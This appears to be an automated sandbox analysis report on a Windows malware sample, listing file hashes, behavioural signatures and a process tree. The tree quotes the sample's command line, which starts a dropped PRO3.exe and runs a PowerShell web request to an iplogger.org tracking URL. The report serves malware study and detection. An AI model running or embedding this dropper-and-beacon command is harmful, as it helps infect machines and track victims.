Analysis
- max time kernel: 7s
- max time network: 11s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 05-02-2022 12:41
Static task: static1
Behavioral task: behavioral1
Sample: d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe
Resource: win7-en-20211208
General
- Target: d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe
- Size: 1.8MB
- MD5: 80286211e348fb262323c664430553f2
- SHA1: c9a55f6c23c55d33925635fcee5fb72ad4c3f001
- SHA256: d23aaa6690b8141985a4237e4660246f83a59460d1fc7c614ae88eeea9d7fd4a
- SHA512: 9cbd4b8b5622879180ea23859cd2611c093673231ba1567a2dff0198998861c68eac7cf9a830b498af121c79fe5c06aea67b7dab429af8c3e58b84d1bc42f122
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Processes: PID 700, PRO3.exe
- Loads dropped DLL (1 IoC)
  Processes: PID 4064, d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe
- HTTP links in PDF interactive object (1 IoC)
  Detects HTTP links in interactive objects within PDF files.
  Resource: C:\Users\Admin\AppData\Local\Temp\PRO3.exe, YARA rule: pdf_with_link_action
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (PID, process, target process):
  PID 4064 (d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe) wrote to memory of PID 2056 (cmd.exe)
  PID 4064 (d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe) wrote to memory of PID 2056 (cmd.exe)
  PID 4064 (d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe) wrote to memory of PID 2056 (cmd.exe)
  PID 2056 (cmd.exe) wrote to memory of PID 700 (PRO3.exe)
  PID 2056 (cmd.exe) wrote to memory of PID 700 (PRO3.exe)
  PID 2056 (cmd.exe) wrote to memory of PID 700 (PRO3.exe)
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: "cmd" /c start "" "PRO3.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\PRO3.exe
      Command line: "PRO3.exe"
      - Executes dropped EXE
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\PRO3.exe
  MD5:
aeb230e71336c19457a6e3443fe1ef8e
  SHA1: 552884c4e035b011b01bb244679f06b6e95d4980
  SHA256: ad1c4836f2ab049f7ed8f3dd43947d197498f92303307bdcbab2d9b52a20188a
  SHA512: 94a75af2a58d91a4c15556f51f8c132e57d29a2005140876accfe0fbaaecaef851c618e0c0f31d035eb0b0a5d8e27d0844b0e7d2278cfb3efa593badfee60914
- C:\Users\Admin\AppData\Local\Temp\nsl4218.tmp\M17UDIQ8KE.dll
  MD5:
293165db1e46070410b4209519e67494
  SHA1: 777b96a4f74b6c34d43a4e7c7e656757d1c97f01
  SHA256: 49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
  SHA512: 97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19